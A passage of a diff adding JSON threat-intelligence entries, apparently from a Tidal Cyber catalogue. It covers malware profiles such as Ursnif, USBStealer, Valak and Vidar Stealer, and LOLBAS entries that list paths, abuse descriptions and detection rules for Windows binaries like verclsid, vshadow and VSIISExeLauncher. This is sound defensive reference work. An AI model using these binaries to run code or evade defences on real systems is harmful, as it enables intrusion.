components.[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)][[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0022", + "source": "MITRE", + "tags": [ + "1efd43ee-5752-49f2-99fe-e3441f126b00" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "80a014ba-3fef-4768-990b-37d8bd10d7f4", + "type": "similar" + }, + { + "dest-uuid": "d2f34441-00b4-41a5-aa43-17428b0fea39", + "type": "similar" + } + ], + "uuid": "89ffc27c-b81f-473a-87d6-907cacdce61c", + "value": "Uroburos" + }, + { + "description": "[[FireEye Ursnif Nov 2017](https://app.tidalcyber.com/references/32c0b9d2-9f31-4e49-8b3a-c63ff4fffa47)][[ProofPoint Ursnif Aug 2016](https://app.tidalcyber.com/references/4cef8c44-d440-4746-b3e8-c8e4d307273d)]", + "meta": { + "id": "6c6518e9-f355-4c3f-9fd5-f5220fcd4c28" + }, + "related": [ + { + "dest-uuid": "3e501609-87e4-4c47-bd88-5054be0f1037", + "type": "similar" + } + ], + "uuid": "18c4205c-8e09-42cb-9caa-0c62560e1977", + "value": "Gozi-ISFB" + }, + { + "description": "[[NJCCIC Ursnif Sept 2016](https://app.tidalcyber.com/references/d57a2efe-8c98-491e-aecd-e051241a1779)][[ProofPoint Ursnif Aug 2016](https://app.tidalcyber.com/references/4cef8c44-d440-4746-b3e8-c8e4d307273d)]", + "meta": { + "id": "2e12363d-2d3b-4af7-87f3-d4ddf8b81be7" + }, + "related": [ + { + "dest-uuid": "3e501609-87e4-4c47-bd88-5054be0f1037", + "type": "similar" + } + ], + "uuid": "788feb5e-d8f2-4f2b-8796-dd66b230213b", + "value": "Dreambot" + }, + { + "description": "[[TrendMicro Ursnif Mar 2015](https://app.tidalcyber.com/references/d02287df-9d93-4cbe-8e59-8f4ef3debc65)]", + "meta": { + "id": "ce0aa4eb-69c7-4f94-97ac-535bb9c6dc4d" + }, + "related": [ + { + "dest-uuid": "3e501609-87e4-4c47-bd88-5054be0f1037", + "type": "similar" + } + ], + "uuid": "0a7f6b16-335e-4e61-8c7d-75d08144eae4", + "value": "PE_URSNIF" + }, + { + "description": "[Ursnif](https://app.tidalcyber.com/software/3e501609-87e4-4c47-bd88-5054be0f1037) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)s, and malicious links.[[NJCCIC Ursnif Sept 2016](https://app.tidalcyber.com/references/d57a2efe-8c98-491e-aecd-e051241a1779)][[ProofPoint Ursnif Aug 2016](https://app.tidalcyber.com/references/4cef8c44-d440-4746-b3e8-c8e4d307273d)] [Ursnif](https://app.tidalcyber.com/software/3e501609-87e4-4c47-bd88-5054be0f1037) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[[TrendMicro Ursnif Mar 2015](https://app.tidalcyber.com/references/d02287df-9d93-4cbe-8e59-8f4ef3debc65)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0386", + "source": "MITRE", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "4d767e87-4cf6-438a-927a-43d2d0beaab7", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + }, + { + "dest-uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "type": "used-by" + }, + { + "dest-uuid": "1492d0f8-7e14-4af3-9239-bc3fe10d3407", + "type": "similar" + }, + { + "dest-uuid": "18c4205c-8e09-42cb-9caa-0c62560e1977", + "type": "similar" + }, + { + "dest-uuid": "788feb5e-d8f2-4f2b-8796-dd66b230213b", + "type": "similar" + }, + { + "dest-uuid": "0a7f6b16-335e-4e61-8c7d-75d08144eae4", + "type": "similar" + } + ], + "uuid": "3e501609-87e4-4c47-bd88-5054be0f1037", + "value": "Ursnif" + }, + { + "description": "[USBferry](https://app.tidalcyber.com/software/26d93db8-dbc3-44b5-a393-2b219cef4f5b) is an information stealing malware and has been used by [Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://app.tidalcyber.com/software/26d93db8-dbc3-44b5-a393-2b219cef4f5b) shares an overlapping codebase with [YAHOYAH](https://app.tidalcyber.com/software/0844bc42-5c29-47c3-b1b3-6bfffbf1732a), though it has several features which makes it a distinct piece of malware.[[TrendMicro Tropic Trooper May 2020](https://app.tidalcyber.com/references/4fbc1df0-f174-4461-817d-0baf6e947ba1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0452", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "type": "used-by" + }, + { + "dest-uuid": "75bba379-4ba1-467e-8c60-ec2b269ee984", + "type": "similar" + } + ], + "uuid": "26d93db8-dbc3-44b5-a393-2b219cef4f5b", + "value": "USBferry" + }, + { + "description": "", + "meta": { + "id": "a3064aee-d2e6-4c11-a0c3-e3e8588b436d" + }, + "related": [ + { + "dest-uuid": "50eab018-8d52-46f5-8252-95942c2c0a89", + "type": "similar" + } + ], + "uuid": "4f016c90-30ea-44b2-8c22-10d2fe2c6954", + "value": "USB Stealer" + }, + { + "description": "", + "meta": { + "id": "5efe4dbe-c07b-4038-9ca8-259b274cd0f9" + }, + "related": [ + { + "dest-uuid": "50eab018-8d52-46f5-8252-95942c2c0a89", + "type": "similar" + } + ], + "uuid": "2fbb693a-533b-4afb-91da-7e62ce0b3840", + "value": "Win32/USBStealer" + }, + { + "description": "[USBStealer](https://app.tidalcyber.com/software/50eab018-8d52-46f5-8252-95942c2c0a89) is malware that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://app.tidalcyber.com/software/ef7f4f5f-6f30-4059-87d1-cd8375bf1bee). [[ESET Sednit USBStealer 2014](https://app.tidalcyber.com/references/8673f7fc-5b23-432a-a2d8-700ece46bd0f)] [[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0136", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", + "type": "similar" + }, + { + "dest-uuid": "4f016c90-30ea-44b2-8c22-10d2fe2c6954", + "type": "similar" + }, + { + "dest-uuid": "2fbb693a-533b-4afb-91da-7e62ce0b3840", + "type": "similar" + } + ], + "uuid": "50eab018-8d52-46f5-8252-95942c2c0a89", + "value": "USBStealer" + }, + { + "description": "[[UtilityFunctions.ps1 - LOLBAS Project](/references/8f15755b-2e32-420e-8463-497e3f8d8cfd)]", + "meta": { + "id": "eb7bd1eb-baf2-4be4-8227-b7036140124e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "50a57a6f-6597-42d1-b686-7003c631ddb0", + "type": "similar" + } + ], + "uuid": "8ef743a4-8788-4bb2-8274-499f4c4f9392", + "value": "UtilityFunctions.ps1" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** PowerShell Diagnostic Script\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1\n\n**Resources:**\n* [https://twitter.com/nickvangilder/status/1441003666274668546](https://twitter.com/nickvangilder/status/1441003666274668546)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbas_utilityfunctions.yml](https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml)[[UtilityFunctions.ps1 - LOLBAS Project](/references/8f15755b-2e32-420e-8463-497e3f8d8cfd)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5262", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8ef743a4-8788-4bb2-8274-499f4c4f9392", + "type": "similar" + } + ], + "uuid": "50a57a6f-6597-42d1-b686-7003c631ddb0", + "value": "UtilityFunctions" + }, + { + "description": "[Valak](https://app.tidalcyber.com/software/b149f12f-3cf4-4547-841d-c63b7677547d) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.[[Cybereason Valak May 2020](https://app.tidalcyber.com/references/235d1cf1-2413-4620-96cf-083d348410c2)][[Unit 42 Valak July 2020](https://app.tidalcyber.com/references/9a96da13-5795-49bc-ab82-dfd4f964d9d0)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0476", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "used-by" + }, + { + "dest-uuid": "ade37ada-14af-4b44-b36c-210eec255d53", + "type": "similar" + } + ], + "uuid": "b149f12f-3cf4-4547-841d-c63b7677547d", + "value": "Valak" + }, + { + "description": "[VaporRage](https://app.tidalcyber.com/software/63940761-8dea-4362-8795-7bc0653ce1d4) is a shellcode downloader that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021.[[MSTIC Nobelium Toolset May 2021](https://app.tidalcyber.com/references/52464e69-ff9e-4101-9596-dd0c6404bf76)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0636", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "96eca9b9-b37f-42f1-96dc-a2c441403194", + "type": "similar" + } + ], + "uuid": "63940761-8dea-4362-8795-7bc0653ce1d4", + "value": "VaporRage" + }, + { + "description": "[Vasport](https://app.tidalcyber.com/software/fe116518-cd0c-4b10-8190-4f57208df4e4) is a trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor on compromised hosts. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[Symantec Vasport May 2012](https://app.tidalcyber.com/references/2dc7d7fb-3d13-4647-b15b-5e501946d606)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0207", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "f4d8a2d6-c684-453a-8a14-cf4a94f755c5", + "type": "similar" + } + ], + "uuid": "fe116518-cd0c-4b10-8190-4f57208df4e4", + "value": "Vasport" + }, + { + "description": "[[vbc.exe - LOLBAS Project](/references/25eb4048-ee6d-44ca-a70b-37605028bd3c)]", + "meta": { + "id": "579a54a7-21df-4f94-a7af-43b644fa424d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "25ae056b-aa3d-4bfb-9b53-ba76bce0dad1", + "type": "similar" + } + ], + "uuid": "1ad2a3ea-b488-439c-ab34-5cf15df250f3", + "value": "vbc.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary file used for compile vbs code\n\n**Author:** Lior Adar\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_visual_basic_compiler.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml)\n* Elastic: [defense_evasion_dotnet_compiler_parent_process.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml)[[vbc.exe - LOLBAS Project](/references/25eb4048-ee6d-44ca-a70b-37605028bd3c)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5171", + "source": "Tidal Cyber", + "tags": [ + "bc6f5172-90af-491e-817d-2eaa522f93af", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "1ad2a3ea-b488-439c-ab34-5cf15df250f3", + "type": "similar" + } + ], + "uuid": "25ae056b-aa3d-4bfb-9b53-ba76bce0dad1", + "value": "vbc" + }, + { + "description": "[VBShower](https://app.tidalcyber.com/software/150b6079-bb10-48a8-b570-fbe8b0e3287c) is a backdoor that has been used by [Inception](https://app.tidalcyber.com/groups/d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6) since at least 2019. [VBShower](https://app.tidalcyber.com/software/150b6079-bb10-48a8-b570-fbe8b0e3287c) has been used as a downloader for second stage payloads, including [PowerShower](https://app.tidalcyber.com/software/2ca245de-77a9-4857-ba93-fd0d6988df9d).[[Kaspersky Cloud Atlas August 2019](https://app.tidalcyber.com/references/4c3ae600-0787-4847-b528-ae3e8ff1b5ef)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0442", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6", + "type": "used-by" + }, + { + "dest-uuid": "8caa18af-4758-4fd3-9600-e8af579e89ed", + "type": "similar" + } + ], + "uuid": "150b6079-bb10-48a8-b570-fbe8b0e3287c", + "value": "VBShower" + }, + { + "description": "[[LOLBAS Verclsid](/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]", + "meta": { + "id": "01e581f1-e88b-48fe-8097-48bc5ab220cf", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "56dc0bea-bdfb-4731-b6c0-425fb7f9bf4d", + "type": "similar" + } + ], + "uuid": "36aff35e-5b1e-4d4c-8690-492221812efd", + "value": "Verclsid.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to verify a COM object before it is instantiated by Windows Explorer\n\n**Author:** @bohops\n\n**Paths:**\n* C:\\Windows\\System32\\verclsid.exe\n* C:\\Windows\\SysWOW64\\verclsid.exe\n\n**Resources:**\n* [https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5](https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5)\n* [https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/](https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/)\n\n**Detection:**\n* Sigma: [proc_creation_win_verclsid_runs_com.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml)\n* Splunk: [verclsid_clsid_execution.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml)[[LOLBAS Verclsid](/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5172", + "source": "Tidal Cyber", + "tags": [ + "4e91036d-809b-4eae-8a09-86bdc6cd1f0e", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "36aff35e-5b1e-4d4c-8690-492221812efd", + "type": "similar" + } + ], + "uuid": "56dc0bea-bdfb-4731-b6c0-425fb7f9bf4d", + "value": "Verclsid" + }, + { + "description": "[VERMIN](https://app.tidalcyber.com/software/afa4023f-aa2e-45d6-bb3c-38e61f876eac) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. [[Unit 42 VERMIN Jan 2018](https://app.tidalcyber.com/references/0d6db249-9368-495e-9f1f-c7f10041f5ff)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0257", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5189f018-fea2-45d7-b0ed-23f9ee0a46f3", + "type": "similar" + } + ], + "uuid": "afa4023f-aa2e-45d6-bb3c-38e61f876eac", + "value": "VERMIN" + }, + { + "description": "Vidar Stealer is one of the most heavily used information & credential stealers (\"infostealers\") in recent years. While many of today's most popular infostealers were developed relatively recently, Vidar is more established, having been released in 2018. Its developers continue to add new capabilities, however, for example to improve the malware's stealth.[[Minerva Labs Vidar Stealer Evasion](/references/ce9714d3-7f7c-4068-bcc8-0f0eeaf0dc0b)]\n\nMore details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5071", + "source": "Tidal Cyber", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "15787198-6c8b-4f79-bf50-258d55072fee", + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + } + ], + "uuid": "ced8364c-e0e2-429a-a029-300fa2f0d5be", + "value": "Vidar Stealer" + }, + { + "description": "[[VisualUiaVerifyNative.exe - LOLBAS Project](/references/b17be296-15ad-468f-8157-8cb4093b2e97)]", + "meta": { + "id": "1badddfb-7780-46c4-b1b7-68d1083b7a3c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "acfbcd12-25fd-41cd-83ef-c7af7cb59fff", + "type": "similar" + } + ], + "uuid": "a11ae9f6-5229-48cb-9350-fcabf73be98e", + "value": "VisualUiaVerifyNative.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe\n* c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\x64\\UIAVerify\\VisualUiaVerifyNative.exe\n* c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\UIAVerify\\VisualUiaVerifyNative.exe\n\n**Resources:**\n* [https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/](https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/)\n* [https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad](https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_visualuiaverifynative.yml](https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml)\n* IOC: As a Windows SDK binary, execution on a system may be suspicious[[VisualUiaVerifyNative.exe - LOLBAS Project](/references/b17be296-15ad-468f-8157-8cb4093b2e97)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5246", + "source": "Tidal Cyber", + "tags": [ + "5e096dac-47b7-4657-a57b-752ef7da0263", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a11ae9f6-5229-48cb-9350-fcabf73be98e", + "type": "similar" + } + ], + "uuid": "acfbcd12-25fd-41cd-83ef-c7af7cb59fff", + "value": "VisualUiaVerifyNative" + }, + { + "description": "[Volgmer](https://app.tidalcyber.com/software/7fcfba45-5752-4f0c-8023-db67729ae34e) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. [[US-CERT Volgmer Nov 2017](https://app.tidalcyber.com/references/c48c7ac0-8d55-4b62-9606-a9ce420459b6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0180", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "495b6cdb-7b5a-4fbc-8d33-e7ef68806d08", + "type": "similar" + } + ], + "uuid": "7fcfba45-5752-4f0c-8023-db67729ae34e", + "value": "Volgmer" + }, + { + "description": "[[VSDiagnostics.exe - LOLBAS Project](/references/b4658fc0-af16-45b1-8403-a9676760a36a)]", + "meta": { + "id": "e9e3d073-b934-4df2-a787-eb98080fbb01", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "fca6d378-bbe6-4418-b238-6a9a63aaabba", + "type": "similar" + } + ], + "uuid": "17acae5f-d999-4a97-8cb1-546118e65b3b", + "value": "VSDiagnostics.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Command-line tool used for performing diagnostics.\n\n**Author:** Bobby Cooke\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe\n\n**Resources:**\n* [https://twitter.com/0xBoku/status/1679200664013135872](https://twitter.com/0xBoku/status/1679200664013135872)\n\n**Detection:**\n* Sigma: [https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml](https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml)[[VSDiagnostics.exe - LOLBAS Project](/references/b4658fc0-af16-45b1-8403-a9676760a36a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5244", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "17acae5f-d999-4a97-8cb1-546118e65b3b", + "type": "similar" + } + ], + "uuid": "fca6d378-bbe6-4418-b238-6a9a63aaabba", + "value": "VSDiagnostics" + }, + { + "description": "[[Vshadow.exe - LOLBAS Project](/references/ae3b1e26-d7d7-4049-b4a7-80cd2b149b7c)]", + "meta": { + "id": "3a585bce-7110-400e-bfcb-ed7b48ca3b1f", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "f39988b4-acf7-4d56-a7e5-8e8fa0b8ccc2", + "type": "similar" + } + ], + "uuid": "012ea77d-0d1e-420f-8648-e4872647ea7b", + "value": "Vshadow.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** VShadow is a command-line tool that can be used to create and manage volume shadow copies.\n\n**Author:** Ayberk Halaç\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.XXXXX.0\\x64\\vshadow.exe\n\n**Resources:**\n* [https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample](https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample)\n\n**Detection:**\n* IOC: vshadow.exe usage with -exec parameter[[Vshadow.exe - LOLBAS Project](/references/ae3b1e26-d7d7-4049-b4a7-80cd2b149b7c)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5247", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "012ea77d-0d1e-420f-8648-e4872647ea7b", + "type": "similar" + } + ], + "uuid": "f39988b4-acf7-4d56-a7e5-8e8fa0b8ccc2", + "value": "Vshadow" + }, + { + "description": "[[VSIISExeLauncher.exe - LOLBAS Project](/references/e2fda344-77b8-4650-a7da-1e422db6d3a1)]", + "meta": { + "id": "ae3a2848-93c9-455d-8937-c1c40b8312d3", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "2517da5a-11b1-4f77-b488-c096173b1b50", + "type": "similar" + } + ], + "uuid": "8b5cb79f-747e-48a5-8946-873ae62a5e0a", + "value": "VSIISExeLauncher.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary will execute specified binary. Part of VS/VScode installation.\n\n**Author:** timwhite\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe\n\n**Resources:**\n* [https://github.com/timwhitez](https://github.com/timwhitez)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_vsiisexelauncher.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml)\n* IOC: VSIISExeLauncher.exe spawned an unknown process[[VSIISExeLauncher.exe - LOLBAS Project](/references/e2fda344-77b8-4650-a7da-1e422db6d3a1)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5245", + "source": "Tidal Cyber", + "tags": [ + "0bf195a2-c577-4317-973e-a72dde5a06e6", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8b5cb79f-747e-48a5-8946-873ae62a5e0a", + "type": "similar" + } + ], + "uuid": "2517da5a-11b1-4f77-b488-c096173b1b50", + "value": "VSIISExeLauncher" + }, + { + "description": 